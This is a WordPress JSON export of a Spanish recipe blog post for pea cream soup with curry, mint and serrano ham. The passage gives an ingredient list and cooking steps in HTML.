{"id":3774,"date":"2017-01-03T09:15:11","date_gmt":"2017-01-03T07:15:11","guid":{"rendered":"http:\/\/www.bcnkitchen.com\/blog\/?p=3774"},"modified":"2018-07-12T04:23:48","modified_gmt":"2018-07-12T02:23:48","slug":"crema-de-guisantes-con-curry-y-menta","status":"publish","type":"post","link":"https:\/\/www.bcnkitchen.com\/blog\/crema-de-guisantes-con-curry-y-menta\/","title":{"rendered":"Crema de guisantes con curry y menta"},"content":{"rendered":"<p style=\"text-align: justify;\">[one_third]<strong>Ingredientes<\/strong>\u00c2\u00a0(para 4 personas):<\/p>\n<ul style=\"text-align: justify;\">\n<li>500 gr de guisantes<\/li>\n<li>\u00c2\u00bd cebolla<\/li>\n<li>50 gr de jam\u00f3n serrano<\/li>\n<li>150 ml de nata l\u00edquida<\/li>\n<li>25 gr de mantequilla<\/li>\n<li>1 cucharadita de curry<\/li>\n<li>1 ramillete de menta fresca<\/li>\n<li>1 L de caldo<\/li>\n<li>Sal y pimienta[\/one_third][two_third_last]<strong>Elaboraci\u00f3n:<\/strong><\/li>\n<\/ul>\n<p>Fundimos\u00c2\u00a0la mantequilla de la crema en un olla y cocinamos la cebolla picada en dados regulares y no muy peque\u00f1os, a fuego medio. Le a\u00f1adimos los guisantes, y el jam\u00f3n y sofre\u00edmos durante 3 minutos.<\/p>\n<p>Cuando el jam\u00f3n haya sudado, le agregamos el curry y sin dejar que se queme, lo removemos bien.<\/p>\n<p>A\u00f1adimos\u00c2\u00a0el caldo y salpimentamos. Cocemos a fuego suave durante 20 minutos. Trituramos con la nata l\u00edquida y unas hojas de menta fresca bien limpia.
